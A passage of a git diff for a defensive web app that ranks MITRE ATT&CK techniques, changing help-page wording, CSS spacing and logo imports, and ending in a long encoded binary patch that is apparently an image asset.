-                CM. Deselecting controls within CM will remove CM as a contributing factor in the final technique list.
-                If
-                a technique contains ONLY CM, that technique will be removed. If a technique contains CM AND others,
-                that
-                technique will remain, unless the other mitigations are deselected, as well. If no controls are
-                selected,
-                they will all be included by default. The same process was applied to the detection analytics, except
-                due
-                to the large volume, we grouped these by the repository from which they came, e.g. SigmaHQ.

+                someone works in Incident Response, they might have less interest in ATT&CK techniques that can be
+                mitigated with CM. Deselecting controls within CM will remove CM as a contributing factor in the final
+                technique list. If a technique contains ONLY CM, that technique will be removed. If a technique contains
+                CM AND others, that technique will remain, unless the other mitigations are deselected, as well. If no
+                controls are selected, they will all be included by default. The same process was applied to the
+                detection analytics, except due to the large volume, we grouped these by the repository from which they
+                came, e.g. SigmaHQ.

             

-            
+            image of filters section found on calculator page
           

         

         

@@ -78,24 +71,21 @@
           

             

               
Monitoring components allow the user to modify the weight of each technique, based on their inputs.
-                There
-                are four levels of monitoring: None, Low, Medium, and High. Each level increases the weight of a
-                technique
-                by a fixed amount. The lower the level of monitoring, the higher the increase.
+                There are four levels of monitoring: None, Low, Medium, and High. Each level increases the weight of a
+                technique by a fixed amount. The lower the level of monitoring, the higher the increase.
               

               

                 There are five monitoring components: Network, Process, File, Cloud, and Hardware. These components came
                 from data sources that are found in MITRE ATT&CK. By modifying a specific component, any technique that
                 can be detected by that component will have its weight changed. If a user has a lower level of
-                monitoring
-                for a specific component, techniques that can be detected with that component will receive a higher
-                weight. The same is true for the inverse: higher monitoring results in a lower weight. For instance,
-                Windows Management Instrumentation (WMI) can be detected by process monitoring. If a user has a low
-                amount
-                of process monitoring, WMI will become a higher priority technique. This should help the user figure out
-                if they have a gap that would prevent them from catching WMI usage.

+                monitoring for a specific component, techniques that can be detected with that component will receive a
+                higher weight. The same is true for the inverse: higher monitoring results in a lower weight. For
+                instance, Windows Management Instrumentation (WMI) can be detected by process monitoring. If a user has
+                a low amount of process monitoring, WMI will become a higher priority technique. This should help the
+                user figure out if they have a gap that would prevent them from catching WMI usage.

             

-            
+            image of score section found on calculator page
           

         

         
Step 2: Explore Your Results

@@ -107,19 +97,18 @@
             

               
After hitting "Generate Results,” a top 10 list will appear. For each technique in the list, all the
                 information from the ATT&CK page is populated. Users can see a description, subtechniques,
-                mitigations,
-                and detections.
+                mitigations, and detections.
               

               

                 The trash can icon next to each technique allows the user to remove that technique from their top 10
-                list,
-                which will be replaced by the 11th technique.

+                list, which will be replaced by the 11th technique.

               

                 Users can download the entire ranked list of techniques in JSON format by clicking the “Download All Top
                 Techniques” button.
               

             

-            
+            image of the calculator page with full list of results
           

         
       
@@ -128,11 +117,14 @@
 
 
 
@@ -144,7 +136,7 @@ export default defineComponent({
 
 .container-body,
 .container-header {
-  @apply py-4 px-6
+  @apply py-3 px-6
 }
 
 .container-body h3 {
@@ -157,7 +149,6 @@ export default defineComponent({
 
 img {
   object-fit: contain;
-  /* @apply xl:w-1/3 lg:w-1/2 w-full */
 }
 
 .link-section h2 {
@@ -165,6 +156,6 @@ img {
 }
 
 .btn-primary {
-  @apply my-2
+  @apply my-2 py-3
 }
 
diff --git a/src/views/HomePage.vue b/src/views/HomePage.vue
index 74b8bad..9368cbb 100644
--- a/src/views/HomePage.vue
+++ b/src/views/HomePage.vue
@@ -3,30 +3,29 @@
     

       

         

-          

-            Top ATT&CK Techniques
-          

-          

-          

+          
+          Top Attack Techniques
+          

+          

             Top ATT&CK Techniques provides defenders with a systematic approach
             to prioritizing ATT&CK techniques. Our open methodology considers
-            technique prevalence, common attack choke points, and actionability
+            technique prevalence, common ATT&CK choke points, and actionability
             to enable defenders to focus on the ATT&CK techniques that are most
             relevant to their organization.
           

         

-        

+        

           
           
           
           
         

       

@@ -35,8 +34,8 @@
       

         Want to Learn More?
       

-      

-        

+      

+        

           

             The methodology page outlines the rationale behind the ATT&CK
             technique scores and ranking. A technique’s score is calculated by
@@ -47,7 +46,7 @@
             
           
         

-        

+        

           

             The help page contains the answers to common questions and issues
             that may pop up for users of Top ATT&CK Techniques. It also has a
@@ -76,6 +75,8 @@ import CalculatorSvg from "@/assets/calculator.svg";
 import ListSvg from "@/assets/list.svg";
 import BookSvg from "@/assets/book.svg";
 import HelpSvg from "@/assets/help.svg";
+import LogoVertical from "@/assets/logo-vertical-white.svg";
+import LogoHorizontal from "@/assets/logo-horizontal-white.svg";
 import { useCalculatorStore } from "@/stores/calculator.store";
 import TopTenWrapper from "@/components/TopTenWrapper.vue";
 
@@ -88,6 +89,7 @@ export default defineComponent({
       ListSvg,
       BookSvg,
       HelpSvg,
+      LogoVertical, LogoHorizontal
     };
   },
   computed: {
@@ -100,4 +102,12 @@ export default defineComponent({
 });
 
 
-
+
diff --git a/src/views/MethodologyPage.vue b/src/views/MethodologyPage.vue
index 351e68b..bc13994 100644
--- a/src/views/MethodologyPage.vue
+++ b/src/views/MethodologyPage.vue
@@ -2,11 +2,10 @@
   

     

       
Methodology

-      
A prioritized list of MITRE ATT&CK techniques should be actionable and driven
-        by threat intelligence. The Center’s methodology is composed of three different components - Actionability,
-        Choke
-        Point, and Prevalence. Algorithms for each component were created to determine a technique’s weight within a
-        specific component, and then each component weight is combined to give an overall weight. 

+      
Our top 10 lists of MITRE ATT&CK techniques are designed to be actionable and
+        driven
+        by threat intelligence. The Center’s methodology is composed of three different components: Actionability,
+        Choke Point, and Prevalence.

     

     

       

@@ -64,7 +63,7 @@ export default defineComponent({
 
 .container-body,
 .container-header {
-  @apply py-4 px-6
+  @apply py-3 px-6
 }
 
 .container-body h3 {
diff --git a/src/views/TopTen.vue b/src/views/TopTen.vue
index 688c5e6..5d894ce 100644
--- a/src/views/TopTen.vue
+++ b/src/views/TopTen.vue
@@ -2,7 +2,8 @@
   

     

       
Top 10 Lists

-      
Explore the most prevalent techniques for different categories, determined by our ATT&CK analysts
+      
Browse top 10 lists compiled by our ATT&CK experts and tailored to specific threats such as
+        ransomware.
       

     

   


HshwxgqY4A=&i*@hA2C3X~p#boW0i>ezzbAP<3J=(x}
zuNnQ~EaNgYUmXl+xOPBhe%{gsFrc6$7MTGN*MPV!7SF%@LvtK|wF`g|iP59Un^z>t
zdUI2;kSz1}e3MF+TDZvZA|*qwr*-GEAad_T^FjOz)6m*`%&`iH2^f4V0hlEo%M4N7
zxod0Uqmg>C@RZZi&g8F>f61rcPI60%ELqc)+k7~%IxWUw&kk#b+|h_Y3A!uk7syeR
zxfqTzy1wqQv#iaQ?DFDVQhBhnH))ig`W*>8S~B2uqvhA(_>5AFiuoH}Um$WW;@g&+
z(dISQN6I}er-EC+QPTjj(X@FKcWn
zjB;T+8qCeNiIu7-Rmm6H(M@G>TcLk#ez@s>ScvEoe~HL=kXsqKiuqKT?XucvqBnbW
zjiB#zotY<6M1{o>EhfAZXyt5+dGqt%por#CecpvWymw7XlSD12)0R6rawVIX{CW?_
zMAh#WuCEHuW>V|PnOw|h
zeg{Aj_}iDJExg%!@nX852(rCh|Gerh!Lby+l_5r{d;7QXrzx$I
z?L)$db7GQ(E%Ougx~FeF%`26=+SkvXQB9-npLyAKcQ5plYyPLGml#LhrGLJvr{D)%
zqgqX*XTHFWFEbxCz%9d@ckA8w;-_e?IlA`dEtN(qUA`=j5YStHzH=DnsjC1sZDwm1U@XdSc<3IcE-=ja-K3Us
zdA}mt_RW|}OoMu=Az<)1~QPenk3{*wnW&|TaOf1-4k6db+8Z)#(Gq$$5)(0gJDCDU+?M^gr
zw5L2{;l-4?^#m(SBcvhnyxIe>H~Wqte#84
z9pJ2={cCnw`?aws!N%7t=z)PoVc6^~b?&V1Rhcv5@n)1v4JHz`by1GOr+!4H2$a{!
z7?oeZ)mu@*tgu5vAku@w0};`&euwtSh2h{!T#cY>9p|*kw&hrtDZbv5%b-31v-QLa
z|GZVUm^8!V8*hZZT4iq5pK|-%_Ss`x3Xa*k3K{7vrH|7$A9yU4%<7aH7oRu4*T=2h
z)QJHLCtZLypFmX6Z`nLrlE*)W^WR8OHXoYtz>W9UTR*eC0K)ce*;-xJq`4TM4~-m~
z7{q1V!KFlfi*Ah9pIbhrRlpPHz87o9YLcWw->jD$Q{F(f2XDE|G{=J;pA_gokqkj3
zUIql9D)ECqc-D;#l|waTO$U9@pTf9Wh;5wwmJRb&vj
z$J)G`?&Kz4rC@iTsZ*N}^UASH*v?6i+0+ehlqyqjTa7y|2VugG
zLX5A6GJa@s$-@3C`VqBi$wl#W@PqhOp(&nN{C=c&hd3~;^ivd+$?DV-d=iyo9GVPY
zA-O(OX|QB6
zvF-tk{5T+Z#3tqdl|0KlOI~kAzj}xmZuV4(BO@aDmmaG~#Fq`C=UwGIU7|p@ZZq{<
z1VQ?yrxZaX&A76Aekqxb!M#i4yoRt-(in9_x!}rp$jW#hvVWsU=u$hD_;cEgjx{*r?XLg6CR40pzMf3juH{|rZb;3|Q$)r_
z(
zhMl#V&@@j?t&C>n4%<8OR#gh#JdGZ;epHaS>OEg|*WUw1y~(Vuap}W2Lv?@8kNv1d
zdJVl8h-7EilaJicHaHiJvkt?Q#&5Pm5~t+4bB?9`6#*L`J-S2nAf@OYr_QH1AW#>|
ztAJF;Gwot&m=iLTjB-W2e~SjAO*i)0IrRDK7f0?$QotHr>zAWAR3LZ+kx@{>VSXfv
zSL@+?N4f9tR1kMhZ?HHJ+~=#WM~sA&U$aU@HfELA7NGvQtTDFBJOJG!v#lhpb3n%V
zxcHuzHNU5eik#%dJ$Cwpzb49@ZVu(0KE5Yxw@Y#~I&*d1;7=qA7q&6W7nZ4JIu!%c
zHW`Vq#N)5-tlcj^M8n>bDmVlTEXme@5Y47GNGEdTUV_7Ab6?upk<
z&}ghc{tAu4;89>gaXd732Wr9)d_o`D`=H)AzzKgP`i|3T<3RPo)Y{_fz!kJ|-k!bs
z-OdQ-BFBfo?B4_4aB*6UhQAPIjWgdc4qh{^e<2@d%=@DF%A(~O6>~+4WH13D0NnY-
zi7OyVVfz8(yY+-xC#m+q^)N$8@oQP|@7BiPr&!-*WH4Uty)4^%Y4Mulb&(myK-oPN
zs0rIxv*>FeMNGfJbd8J*Ixc1&pkG!N4Ihu)YTWwp24wwx`MF?Ui|2Qx{AN#>U)zG#
z(wT(kX69Dn)dluH?hLv9Yk#7?)VD2aANGc|a#ba9cGyPv*oA5)>SVR9`f)-c+DyOH
zQ(^qZKNnbTsI!!1#oyY@`XGo%xy<7GoTy<)KY#sfw{c9%_Brk|2YG#EKLyM_ySGN
zo0v-$+y?ir*eR1*^jD_Hb&5;IZk>+m<&I~Iy5sqEnrLoVvrFEK=J3^V=$%_NBWz;(
z4$fANe;^qVcbt5?(MqJDZ=Oo*F}U+#cFHjG-LkRjZvs^J^qRqfnV_oy8~8KTEmgSq
z4ZuVD(kd+DqD1uTZE5wZmrQ?P?IcxSD^FL)`)d`Ds=du^jOT=c@ygAFO$-j)Wy`r4
zD-!$-loNBA(MrXbZPgO|nl9B2BgvmPOzXwNUmc5Tl1ZUQ;~NOx{`qt5k`)x$0=f9U
z)*y}5lb}p$aV91VDc76dQM_27m?}Cu@zk&`U3(|wo*PH3PVeAqJms)9|8TLNe=FY#
z#QoBA6!$?>bGk!V>`%t$mzz?SS}w;Rb<*WX{5grQw3vVI^ZwZTIr*tB2^{KVI?
zaFJ0dT;$7@Z<6GkBLag)m;r0`^oKtY1Ve=;eVSiQeFBL58E3VTdp^Yt1B0i0+%+azR
zyAb4%>ck&(thWh9wg0Hc^Jle$7}gXpI!$~fLVQcIz#>
zFXxGCM#AetxtAt6>e7;R)5Q;WpN?26=?lf{=C)Ue-$VA0&m33vPZSHQhj@S1%9h=W
z>wj2ukxJ~S^uJlCLiVfx96jH(T%<38UcSSXm=Kc8{FJ6*wM|1wI=xv^g`_2BPW#jo
znqMUFbH)Zfm0ULFZ`-=mTmL$;h?(Rd8>+nDT^VbF9feo;9N~}gKt?FF^<;7mjo)LX
z7N1{^oqoUV{qtldCfeq&4mhl$TLQ`(X?CZ93Z>8DfQ?X$x*}6EwD3iXOrCF0yP>ZW
zJ?ZCmxwrC+Ujd9@B^~TU8YC2~)m>Cay9RUlp@&`ZHdL&+ZbV
zZtPZ$*UMbaJ$>7u?EL`|rJio0;rbir#4rFgGsze?zgp#S?F%e#Lqe-x@+f5&LfEV^
ziaNV(wHIdqK^VS=u)-JM@q->;ge47l_s`3%RyUL^
z&kQ9S^`GdyW5K}nf7r&U3jPoM@Gh}6n0{Py*X{bI9s?bgkeNhs&Bl0~Y!i13uA~9q
zY4W!Gyj|nzqbX!x)w+KAX)Tku5{d%5|N6g46D4Z=Z-!k-xro
zW#zt2(_x^ejfkEY?Bxj==HLc7%TD9w!$U4yF{lpcTIuJI?`+JlOckzdj)Qye4ftMU
z)Eu=$EiTg@U6N~w#DtqBOf!C17=FG+e-^!I#*$pFJey<9xrjQ1f6z?MnpS5s8GGJd
z)7#D{(4Z=3k>fLgu4WOHSTeFF6R3DhQ`iL3pu#dANOF5?9-4g%B4~wnGgXezx8J{e
zzoNTiZhR$c19iTZu@b;huc5Fv*y89+b71;N)*9j;)1BGL=)%m(x?Dq>Y$oQ!AVf$s
zgl&(%E3BbhM5m#OZe-=+yUA;62yGO-RR+>{Kca{2BJkx`O~MbNvUJ=ZmwA@B
zc*s2=Kw;onl_Ts8{CPqTrnQhB}P0qyQ#@y>KwU?nUk+%C#bT`7E>amws
z9El)z=M?tedJ$hG@bMUH*By|AJXrrwlDkVa+*a&ji|h1yPT{yy4PJYm>0$pwV5TIew=vng~Ks&Q~rYOoDVN+fxN$)>5?D6iPJ8m=mbFZ);rCdI&
zc{kVFx8tV)7n|OSS^UH6a)QEJyy4EhXKU(^PyScid5-(Y>J^lV;p%`(eWUe9#!MM_
zV|@R^{@-j=&cJ?BvNUjZ>0*1YN^(`Is&7njX7WXkgi>96Ha8lDR)2h4O7RlxB;C1$gAl>)VXsx<_~rv3J86d7X*K0}C^3+Fd)fCc{gbr7
zfZmcyj1j8g>nhsN4rg8Gu^%1zh+3_z?UWSuwERyG?6a_&$RD2#*(am7eA%R3Jvh}w)C-36vs{PgIskR?GZO(dz5?v15aekI3-%
zk@nr)(k?vO{>zOFN$%#=g!`~+qVYg@1c(H&~*A0~Hu={Xj`z2}UW
z=CfUCfQsn#^>>U0)1Arq(ks!ALCTip&S67sFdy>>VO{f@t!R7^7)M>_z!tVe5nE=o&+$DvIaLO+Cn~Q8_rwwH&uvIEhqivcYe-aO&={wSrJZ!u(=Q(G(OZ^SS5Uub
z%dh!CPRf#OXV2i9nmeSecuY!?tMF%^7+hb4*hlJI$6ESg^D+r*OH2&}Teh%z+I3)_a_K;%!JYZ6sPR=(|?UM9Uu(;QoJ|Se2#^8y`k$*{iwrNwz5b7@YTCb
z!>Ig&$^&>h)|4v~`(b6$nMax7;)bxND4aHm`@p`qD{My)K>`zb&4mQT*E(NvdQkpO
zSwVmDyzZrXwS>OWdrgOLTIbOmzAWIG12bh}KiA3LRD(W8Vt1dW^o9xzFNm`D&^BA1#uel2RY7iG)*Vt_&Uj
zH3i)d^SuXpwX|U+J1Y9JyO{gYC^1`8L4H<$5FHLR-2<-<*Ose^S%#~OCJwGJ1Y39d48oMRhMZBLb1XXypyDJwV1I@hz5Zsq>z
zxiZah%prgeuMv%KY;DUVF$~q1m>t7k`snIZ_~&Pt67no}zjQ#l^Xl8#&tl&dF%$1y
zr?krVO};v>5|p$FN%`K$NS=>+_kIocOgCzqCRFrpbb72o^imcxgHo<;Rdn7)qDryj
z$3=|NU3*RKAxhivz#oF-^Fw>^?p+}Te#_ZZrt$2bEBKsqR$hIj-JjE9p6oUIahzL{
zkwwTgXDs;~eP+K8Amhw)+MGNNOG2raGSQeqzY6C7u@gNLpRRK|SAs$E-(mt>DKRru
zqX?Q4M?wmRc%|Jx>&LPk7djwE-f>M$ROULvsDp){y^j}+HMQmJADV)6O(0W3pHP`C
zw_vp23DF4#GL|>ykbU23b8ICj5r9YOY)&(;-ewgG>@mz-o1*ra*s6+ipm=o*!iJwj
zINmaO6|~*o5alCFtIf_nTQ?pqcI4Jv;*8z16t1Cbp&+S(Q8=;gk2``st;Ol
zW8Gc!`oPnTQiBA-O5~h;F{umfvB9}qza{9VlU-x52@7eeyS4q<)0y@GH$7g
z_oq%KUc!VIrLN;aoQ}PcBnv1Q@1XU>ur%kc>bsn&FNGi-xoB1^v}~Jq>xbHY08L2n
z3OqD%oysF5>4A}LqV07DQx<3pD#M}3B|2Bdi9
zTq00KgaakDwxZ$wZtj{~tm8k>oPDHw7V5ZPJ|y--ZvjCw`Mk#vD_F-28F6iu!Sx
z;`uvH{7+rF=Mt3^`g2f*^`@?_rwV3Wp!qn8;h*eO&bhO6`~P@#zQ>8fkPrLxfa46-&`yM5KRF|(n=y`j
zQ_W?U3;Mtr6PhA;|ZU$wgln=xrA&6jc?*{mF%Zap=|V^uu-v4YM0a{g#e8Xz0biHLJq>Y8+X
zvfouiM;lBrEnMZ-pp1@jVHj0Y1u<^9kc+ve1;gkPFdZr@FA#&HNLSx18vEFLT#O37
zf-V0x6W%Ez^$%~}SWVs#UfFBcJ)v@mei_f;_dy~%U@-1S(wi6h3{DCuB+TUYU$=Nw
zP0cp;X;tLiswnL4x^@)NAmZ$W7`pSsqHG?+hj3}}_EUWMd4l=-<{O2V&T5AM4^~9$
zi?@Lj)169^(S}BP9W3P79y&i?uKfZT9@uEA1wLJQ?_xMMy=Ti(OQS?ink@P^hkZ|o
zX?#~)yo3x
z=-R?c7x^O0P^HIL;r>l8h(-~ZV>Hszgpd5a#q{hb_}3fy88Z|A6-VpktS!rpW$Xso
z{g{~68Ky52%6pLc!KeV^6CCsSNndB3*uaRCBqo6GazQN^V|X~o>9F0)TX7y*9$!B{
z{>ndE=Tt2?+SXb6L3969G?X5bs;@Eim!mT#vr^f5&#zK`1!+z9iO{ag2g{VtNJ{G+
z#raFUvbe}Py0*jb5@Y`MV~*gSBKLyc&`w+J{AR=VnzM@&!k+3EK9q=ImZzdGTU|aM
z5I7-&hs?e7buFNlM|OH80F0VBiGy(fmr;wP5qxQz!QH}@<^VXVHQ~~#mlMffHuxa`7mB6
zy?*eiv1~D5@+Mr*dye9LRx_f$72E(AzfQuai0sHi*!_{osZ{M2pwnBCg}YRVoIdTE
zt?cC~-Q6My*+bFX_)^)^v#at(pRMGbN(6!*iWZ&|r%O0_aw}}1r+(jE8k~}tJ>R{W
zBD0rji9U>2OW^J3-?SF8KL2*8diOqaY@`#uSo=hr+EmlvYueh=f^`3gOM>!|C{{`Y
zsL#hNL6Y_`;3Nv{MTSsasyk6qm(`GT^0AgDKj+50u&B0sXOH@k+uBB8^f4VW!kHW2
zumHr#1M!TiV7Eqj5kC=k1`JP|#^36hQ<#Wg8mJE4GoN=fzQ_W8G{5L+_H>Tfe#n#m?<
zOwbzhHYk16e8XOFR?65o-3sydZG2dK({t-zIRXv0JxB=yfP}}hnD?ntnAs{Q%NB0M
z$C*jZaLQHsK%aAZilAFx-=%t9y>$`7v1BR15m#=8os{&L_c6~Fg9r>!i&8{BRyfpK
z0H3QUFY;0HCPbt)+YB?juVw8@jBt*(J}3X4+0}ng(&(4gPLm}G8xGwa$tzo#
z{2Uo}h~bN?icIJ@y!M=J;|?o0GPeTG|5kqufSI^5Fc>b9qV!z)xQD9-3X^Yz91S5@
zCJ6l2emnJ&RAonGf!^OdPoH#6uqOH3#K8Vdfb;T?cMfU
zIaAt4czLSL({2wZLW)zB=%x>r6>f#ad7L%{y#L1qI1!HJtQ~J(@Z9?{Tz4|tH0*Ku
zfpc1kS}^O)RvcmXyS8o6bvi+(=2s>G5H#0gnIAzNzqH{(!JznZ-I-J_83ynVUnA%L
zQ8;lgzWdA(lHA-!ba*#Zs##e{%Kv%mol1R6;K;Et&lSZ!vuGR)76F4B00~Slle3AA
z-E*)ccve*8V!Q(=u$dayNWR>v>NBFol!&tKv)$T|_UX+jZm`8}zP76KKRvzrUegm>AA!My-YG=KI)_#-q|~
zA@g%a#Aeo|S6q7z8R`l0SqW()I!JWKizRC%^z1XN2bY>yn@wWZqzHb20!JT|-NilG
zJnNbC?wx-e;e{qBvrAOa48sSFN$ihhho*aj#94tKr`OBG;Ql^uKs_sDz?3Xv9F
zYr@KW$RIjcM-dO-QE{ig`9ZaLAf)(v<*yJq3z2Hf%f+m#TKsZwTb#s!ECDy?;JjIp
z=b^&G4Zr^=
z9QuHtIT0T_wIU)5FKlBNUlB{nrjn2y9e~UaM+$Czc%}tKE5^N0UDe4uGX@LgD8&vS
zDE&m}X5$v={U~*haJDJJkFfa2k8rVx5fi==pxb+=Ji>w3_53G9(1`^P#$To=k}0s#
z&p2v_MeTl6xQeL)mvPhIFgfK)&AKX_M|9~;BbUmywZ@>YTqo+?0;o~%79+p-GcBH`
zD_zL$R2le1HvD?{oa-ECCG3xVPb<+9Ovr1wTgj`t+q}Z(=lMVJ+R1gz(@~a0Ax#IfhDvc^S;S+GrJ2eJXn98wZXzlLChsf
zb~DDoXQjk)*Mwnc9SyfbH^c9or^LjK_GQEyqGH$qHoVq#Yq0VjFiaDI9;x#oU1zI_
zaeH0ZSB`2}*RfUXOg{TWQ3K4dOCJL#7VFs4@m=&3h*58UN&P^6D0Se}n#)UNtP`dl
zQ7RSn#)?hB||`WMAcRrCPf&F|0*
z#-ipTNCH19!1y{mcGvxd3{eWOIL3#qGA4k#Z--dqua+QmUd4;km}P0N+yDj588W@>
z_`dL7o8rr-bBU~Sw>p!&r~4lE&3mL+{}=OHy&&25!}Di~r>|h8K)loFfHbvhr^kmQ
z&A8dTG_E2<Q+dxPxZe94K~MsK{wRz7uttl}gir&2C=$
z8=*=SrYk7ksAv(B)QUu%obP0vPFB3#ojA@t!|#dqiR3ezpg>Sqdo!uRyor4TPWdhO
zYRpK?tiz|ud2<0)iDl=Ex`ZrszcOg8?Pc1))z;A;rIh2ciogVHLgMRHo<}>cWSTY-fv8FMW@V|&|7DK>3p%)edynG-;%@
zVoesP(Q`1Ra6%C=Df(&l%w2b0$K)PzNaI3Nr5cM@%t^UuFq&j7za}TFqoAe^@d5I>QXW#v6
zVf}?3n4arhT>#A&DTm_*tJ`=>z4oK6zl)y}#;_AB1dTh^epdH>IL$OCb+#XVISnBBL+4Q{jmoP}XDJHT2{IhLuClZyD^a
z=Bse=4JP!qM;ck+CClUUtVa`($T74?w^*@P#yhRW_R{LT6UQuc-1)|*Y8F>fK_sE5
zOpKVxgsby{;$}ph)E
zVf1Gc(gYtMjE5sZg}?~m-jpj`*12Go_vk(A@~q(1NCU-dmBiOdsCf;5?D11l&4O|e
z`yXT%B*VrB)+4Y?O0aqgAYg9X6~bA*DlE+L!-Y`+^>iZXPv7cvhV`@wcu(X6lbk8gawb`#u`
zdZ+GE%OmFdr4?1AaF*6L(<_1~1f61%<1q)Bvy41^%(TMh?ua_$^e|GEpL$
z%zfYd!~p$JuH9%)PCZTkR_iF3u*dmhpb6#~Eeh&%MS0GO;
z)c#qwMt_p};stn#hpQi01$2zs8Fq601-b=OCTgHKZqS8|=*#JE{;2Tb=Bea*rJ
z)*FM&J$ysd1&I{XEkCqIfVa8~v{6PH;pYBwswCv}_c5oK5H*IFgtNr2;lO9Y7e)7ManizVGZnD~wrj2q(+s$nw9
zjaGlZ2Mo`xzDsK_tq9It!-Z_V_QX8CUm{sk1fk_4X~J3dZ?<@kpx5jwnZ@J$Iys4O!5VLOnMGIR0dS
zmZGc#U{u3(B`SJ{UcowFLrTZv-9=FmS?dSfHIs}oD#)x?s2_NY-$B#mld_-}-&}pg
z>w?H=MUrm(`)5zk-0=xFTa7-8qcfbboMOpUfBwwX9r_XsT|eNPtZ-;<2E8fpnCBkF
zaqmpcZ=7vxRr;=O9!TUVk>7qR+`N@ioi?Sg#kZj({9Tzp^8?nKj2d)JHEN3&Pp_lX
z7d>T!R_Id74;Q4*J57(VBPQ2|Zc$tQ?YD1er%yr@R1oo~l3*Id{n#Ef${w6exu*a!
zxwb`jdLmUiva
zKnX^_?rm?SNaMFojE+k&G@is;Dqq+A%>+u!F4L~((@y;8``%@>Ea48&Td2hXhaqt;U-T$!%M
zZy9kfi<6V6JX>ggTQfru5v_cS8x8-}j)T&&Wc~n+uPH~Q?yk{3r8acz&p2y|037Yg
zHKp*#w;n%70vh)7rcn35!tZTw6?x}k{L+JrI-)QSU<570};l
znrz%_YL#o3`I7|a-Vm`vJiHYB$q!W*uCsbI1{jFQdRIQ-Es1hyHxXS?^kD{uweB#C
zH{)KhAJW?ggO?=rZqibj0D>NhAPYZ=P7Whcc9+x_9A-Ld*WRy?To){XiW}T?~8*#
zh*+pIIfB(`9iuqqip!`TNbNJxaIP0$=86Dr1PTN(RKD4QIT$?%vrn<6wsIXoH^slP
zrcP+wdk)dC!K_E3ZIw^jsCRp_k@ea3J%vo05xZrnatdCQZ6RL@LqPJy(V-9f$U;o7
z3Sl=LGHlk1TYP~Hz5XmOtE?5DgjlFSE=vJXF@My(e7i;i&}Ep4p!n*UJL|GD2MD9go7Zizi8WfltbrmkKR!DlRH&M`r6XD;Dn;+J!$(3(X{v){o(
zZ5gXKd3btSJ6s{}PQq)bF!|y-oe2@R9)?sprjv9|<|aycf#;oL%5>%`UH$W{dpS|$
zBdZj|DVXn^fH9~#TS1ohZ_3CuAy>LeIIs1c`MHdZv}71%zE@V}aX>I@K2Yb_e8a^r_ZNzm&35pAaque)fMNz`A#p7nq#05}^Duhx`$W4WJ~?y2NXlU$U=od73~zueQAxbIw%u
zd8Cr^-Kak)oK73wd_~Poea!o>{Tw1Q$hPjYKU6$?)UcSh9=hoR{JW`_YTLFAFA*K)
zj3rjid?Zu*ABUV@!UiG=uj12NNHxTScEpU=AS+JFOiw(pTYT|JQN|=!IR>;(`6kV6
zE-hP|At0rQ#^v0kGUco1F_a5f6hOBOL3+kRr20JCk>xK=h~S7>@ikj-3s$COkS-Vj
z916WZU8H>;oHYPlahcE3O6detR}41Bk}Sgd#q&u`HzA3cGJLzCXO2kgQIk7!k>=-m
z&nmW~aodDAcfoxKrxWVqNMxk+t^H;tVagnIZS8x+5jT2)sPQcR(SIxv2>deO9EBoL
zqMa|5e%4?%|2n3A^GheJ&Ax`TL5kg%V*#4C;FDpu1z%L9g}F4=NdCGE-`G{FLr_oq
z!g_`a!V;UtWj?GI?tAmZtv#Jh9=UNjp2?qaQ&iL#FjNFCz=|eX!<^58HF8+`2C~C$
zaX$_CgGkb#LY=!*%y&ip6!76c0OAG;bGhEPN{u9MYnD;;E)^Pq2vjrbIy%432`~uH)y#+mr-hov8Z+YAcmtP40
z+|rGGRd9|d(C+X-zllY-x8%8i*X>T*0|<1nv_xWXQgs|ncF8T`rjKHP
zFAh4<1TfQEsA#iE-`NhrojXy)k>2<)<6LouZfa9ssNJj}J-=LTp1AsI$f}*)J0qlx
zedo_8aZN`E3~WV^Ce;!7O<4ylD`9k4gA~Dy9^?{JzrN_{Oo-m%qQ5oIk#VO$vu+J^)YY^
zh=_o42C}D{w|NXf71W{C@;b$LT(gg_?VTj>`Y6|-dgbJ2>DSHcC$J3Q6!pql{dr&ar;!m&6#E|yPSllqTP)Gz
z5|&loj$}R@mX^jI8)Dmxz}AKVMr#WEKIz)J`xihEsGk%o3B7B8e@U>{5WTAy|6pS$
zS^qEqIp>qnnZb2&ETCoX878JrZNq)b?P&L);V~p`MMFvVIP)Gs1a<*dwxgcoIq6HS
zZBrw4Kpc#
z^u}rEm77@FYxSA+Fro{kW}8TY+*kV5_n*Z4=tnIJhi4rl7AwayJ`!5p^HCnWIZ=M)
zP8Jul7z;;faB`x&o(nBfK!MrNvJceE&BsS0yZ_pIt^mYf6Y6OTS0!l14fPPJHz+K_
zF(z)i``Y2{XsbM$6&c9zTK$5Cu!#>WBHIHThAtYokF>U(Mtes`e!V3ljV~Z&s6o+Q
z#(}DY-K`!~!hNg}V9~N)R0r)60iryKV5DizjS!ZTHAriZ!D9@2Ar|{bi?N)KK
ze=$A;dQk;V{{ZU!s;TdQ=nerK*b%h9#RL|i5@;u8*A6kYy$tGjpsY(1?<4y;Ff&N;
z6?F$z3tEyUb6gP#lQ&JaexSvaV5K((ic$*eCWs-F;#)!}S)aL)#+^)*m~LNlDZQ9B
z-8~dU^K8ebp9at?;Ag_29=K-%{dMcdP484%&fia3-D?%`_YaM;0B73)d*;H|dU3OE
zRN-gxPkWwIfew`}Hs23x=VDAZcn7V}j*$+;06`0pniV}%Q
z3xpUQS)dSp`Nzg!fmbRh!((8fU&&jY0vMeUH55WwON^(I00fhbwhR|k3W^{+b}3xr
zoxSKxq#(p#_Bl>y^%#QZgYkKEh?rC})c+@$&HAw`lb+98_{0SPIFoNt4sPFwd4bFO
zSz8rnAtB#wPo@7bW4+2Ys2Ym^T`IP1WREK
zhm~o^tAV=0Z<}_sTa&i-Hzse>4)=EbUcBI!4YyCJ_{Wj+3%+oP?ic#yiJZwNb`n3j_It=z3F*qpx
z$8!S@y5t9Y>z+M(*YQ9A=g+olN%h13<}PY85bzaE!$C>nS*C%a6Cg5-VcM4M<#L#4;T
zo1wgW7Z-P$P{0?6((SbV?0)~uVWw0=NY=v7vaLTdo`QIFShQXWLN#+luWx+b|G
zUujjsduu@3D=O@HtPh;kv9CM<25=f(U|-xBIEuH*D>XA>Dqv1XMUP
zG3-!o=P~cfgDa_5Zfpjq$B3%FOc^!+pmQ{KJ~|`|7I(SH)O`T}N%qKtbKXzX6$>2-
z7T#aX&UhsndADKU!Yc9#*KLpNDeC<=3z%^BS9`c+^xmz;;?&_9tod%q474h7^I7wg
z2Oi=$#+%_@EKEg&hAtrIh{3KknBj)@|44C9DKM{O$oyUa)VSXtV@9|HElM)(HHv)6
zO3_2bhtis7&7ep?%c`E5SNf7UB*d@iOrSOi*e^o>Q)-R;9N~?yg?j|H$=AZ5uk#P#
